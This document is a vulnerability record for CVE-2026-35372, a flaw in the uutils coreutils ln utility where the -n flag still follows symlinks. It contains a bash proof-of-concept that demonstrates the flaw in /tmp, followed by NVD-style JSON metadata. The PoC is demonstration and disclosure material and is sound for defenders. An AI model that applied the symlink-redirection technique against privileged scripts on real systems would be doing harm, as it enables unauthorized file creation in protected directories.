CVE-2026-35372

#!/bin/bash # PoC for CVE-2026-35372: uutils coreutils ln logic error # This demonstrates that `ln -n` dereferences the symlink target. echo "[*] Setting up environment for CVE-2026-35372 PoC..." # Create a sensitive directory simulating a restricted area mkdir -p /tmp/sensitive_target # Create a source file to be linked echo "Malicious Content" > /tmp/malicious_file # Create a symlink pointing to the sensitive directory ln -s /tmp/sensitive_target /tmp/vulnerable_link echo "[*] Attempting to create a link using 'ln -n' (should NOT follow symlink)..." # Vulnerable command: ln -n /tmp/malicious_file /tmp/vulnerable_link # Expected behavior (fixed): Replace /tmp/vulnerable_link with a hard link to /tmp/malicious_file # Vulnerable behavior: Follow /tmp/vulnerable_link -> /tmp/sensitive_target and create link inside it # Assuming 'ln' here is the vulnerable uutils version ln -n /tmp/malicious_file /tmp/vulnerable_link echo "[*] Checking contents of the sensitive target directory..." ls -l /tmp/sensitive_target/ if [ -f /tmp/sensitive_target/malicious_file ]; then echo "[+] Exploit successful! File was written inside the directory pointed by the symlink." else echo "[-] Exploit failed or patched." fi # Cleanup rm -rf /tmp/sensitive_target /tmp/vulnerable_link /tmp/malicious_file

{"cve": {"id": "CVE-2026-35372", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:41.850", "lastModified": "2026-05-04T18:49:46.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic error in the ln utility of uutils coreutils allows the utility to dereference a symbolic link target even when the --no-dereference (or -n) flag is explicitly provided. The implementation previously only honored the \"no-dereference\" intent if the --force (overwrite) mode was also enabled. This flaw causes ln to follow a symbolic link that points to a directory and create new links inside that target directory instead of treating the symbolic link itself as the destination. In environments where a privileged user or system script uses ln -n to update a symlink, a local attacker could manipulate existing symbolic links to redirect file creation into sensitive directories, potentially leading to unauthorized file creation or system misconfiguration."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.8.0", "matchCriteriaId": "2365DBBD-6F10-4651-8DA4-08AE79E14423"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/11253", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.8.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}